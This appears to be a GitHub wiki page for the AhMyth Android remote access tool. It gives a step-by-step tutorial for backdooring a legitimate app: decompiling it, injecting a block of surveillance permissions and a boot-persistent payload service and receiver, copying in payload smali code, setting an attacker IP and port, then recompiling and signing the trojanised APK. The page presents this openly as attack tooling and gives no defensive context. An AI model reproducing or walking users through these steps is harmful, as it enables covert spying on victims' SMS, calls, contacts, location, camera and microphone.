Skip to content

User Manual ‐ Manually Template Original Applications ‐ Boot Method

Jump to bottom
Morsmalleo edited this page Aug 23, 2023 · 21 revisions

Prerequisites

  • Apktool
  • A properly configured, decompiled AhMyth payload
  • Patience


Boot Method

  1. Decompile the original application using Apktool.
apktool d original.apk

java -jar apktool.jar d original.apk

  1. Enter the decompiled application folder and open the AndroidManifest.xml file in an editor such as Visual Studio Code or Sublime.

  1. Copy the payload permissions from the "Payload Permissions" dropdown tab below, and inject them with the original application's existing permissions, then save the file. Follow the dropdown "Help" tab to view an example if you get stuck.
Payload Permissions 
<uses-permission android:name="android.permission.WAKE_LOCK"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.MANAGE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.WRITE_SMS"/>
<uses-feature android:name="android.hardware.camera"/>
<uses-feature android:name="android.hardware.camera.autofocus"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
<uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_BACKGROUND_LOCATION"/>
<uses-permission android:name="android.permission.INSTALL_PACKAGE"/>

ℹ️ Help

Original Manifest Before Payload Permissions Injection

Permissions Injection - Before


Original Manifest After Payload Permissions Injection

The Injected Payload Permissions are Highlighted in Red 🔴

Permissions Injection - After

  1. Copy the payload Service below, and inject it with the applications existing services, if there are no existing services in the original application's manifest then inject it before the closing </application> tag in the original application's manifest, then save the file. Follow the dropdown "Help" example for further help.
<service android:enabled="true" android:exported="false" android:name="ahmyth.mine.king.ahmyth.MainService"/>
ℹ️ Help

If the manifest contains existing services, then we're going to need to insert the payload service just after the original application's last existing service in the manifest like so:

Original Manifest With Existing Services, Before Payload Service Injection

Service Injection - Application Tag - Before


Original Manifest With Existing Services, After Payload Injection

The Injected Payload Service is highlighted in Red 🔴 while the application's last existing Service is highlighted in Blue 🔵


If the manifest does not contain any existing services, then insert the payload service just before the closing </application> tag in the manifest like so:

Original Manifest Without Existing Services, Before Payload Service Injection

Service Injection - Application Tag - Before


Original Manifest Without Existing Services, After Payload Service Injection

The Injected Payload Service is Highlighted in Red 🔴 while the application's closing </application> tag is highlighted in Blue 🔵

Service Injection - Application Tag- After

  1. Copy the payload Receiver below, and inject it with the applications existing services, if there are no existing services in the original application's manifest then inject it both before the closing </application> tag but after the previously injected payload receiver, then save the file. Follow the dropdown "Help" example for further help.
<receiver android:enabled="true" android:exported="true" android:name="ahmyth.mine.king.ahmyth.MyReceiver">
    <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
    </intent-filter>
</receiver>
ℹ️ Help

If the original application's manifest contains existing receivers, then insert the payload receiver just after the application's last existing receiver like so:

Original Manifest With Existing Receivers, Before Payload Receiver Injection

Receiver Injection - Application Tag - Before


Original Manifest With Existing Receivers, After Payload Receiver Injection

The Injected Payload Receiver is highlighted in Red 🔴 while the application's last existing receiver tag is highlighted in Blue 🔵 along with the previously injected payload Service which is highlighted in Green 🟢


If the manifest does not contain any existing receivers, then insert the payload receiver just before the closing </application> tag in the manifest like so:

Original Manifest Without Existing Receivers, Before Payload Receiver Injection

Receiver Injection - Application Tag - Before


Original Manifest Without Existing Receivers, After Payload Receiver Injection

The Injected Payload Receiver is highlighted in Red 🔴 while the closing </application> tag is highlighted in Blue 🔵 along with the previously injected payload Service which is highlighted in Green 🟢

Receiver Injection - Application Tag - After

  1. Head into the Decompiled APK folder of your AhMyth Payload and enter the smali directory.

  1. Copy the payload folders inside the smali directory, excluding the android and androidx folders, these will be copied over later on.

  1. Head back into the decompiled original application we're backdooring, and create a new smali_classes(X) directory (where "(X)" refers to the directory's respective numbering), click to the dropdown tab below to see more information about creating smali_classes(X) directories appropriately.
ℹ️ Creating "smali_classes(X)" Directories Appropriately

Creating smali_classes(X) directories isn't as hard as it sounds.

If the decompiled original application contains only one smali directory, then this directory will always be titled "smali", in which case all we need to do is create a new "smali_classes2" directory and paste our copied AhMyth payload folders in the newly created "smali_classes2" directory.

Before

before


After

after



If the decompiled original application contains multiple smali directories, then that means that we have a list of smali_classes(X) folders on our hands, you'll notice these directories are numbered as well.

So in order to create our new payload directory, all we need to do is following the numbering of the directories, which simply means that we create a smali_classes(X) folder based on the numbering of the last existing smali_classes(X) folder, so for example if this last existing smali_classes(X) folder is numbered as smali_classes10, then we simply create the directory smali_classes11 and so on, the new directory's numbering should always be 1 more than the last existing smali_classes(X) folder.

Before

After

  1. Paste the copied AhMyth payload folders into the newly created smali_classes(X) directory.

  1. Head back into the smali folder of your decompiled AhMyth Payload, and copy the android & androidx folders.

  1. Paste the copied android & androidx folders, into the smali folder of the Decompiled original application and replace files if prompted.

  1. After copying and pasting the android and androidx folders over to the smali directory in the Decompiled original application, you'll want to then edit IP:PORT file titled e.smali which is located at smali_classesX/ahmyth/mine/king/ahmyth (where smali_classesX corresponds to the payload directory we created for storing AhMyth payload files previously) and apply your own IP address and Port number, once you've done this, save the file.

  1. Close everything, and recompile the backdoored application using Apktool.
apktool b original -o Ahmyth.apk

java -jar apktool.jar b original -o Ahmyth.apk

  1. Sign the backdoored application using an APK signer. We recommend Uber APK Signer as it not only signs the payload, but also takes care of zipaligning the payload before signing it as well.
java -jar sign.jar -a path/to/Ahmyth.apk -o ~/path/to/output/folder

java -jar sign.jar -a path/to/folder/containing/the/payload

Information

Source Code Setup

Binary Setup

Clone this wiki locally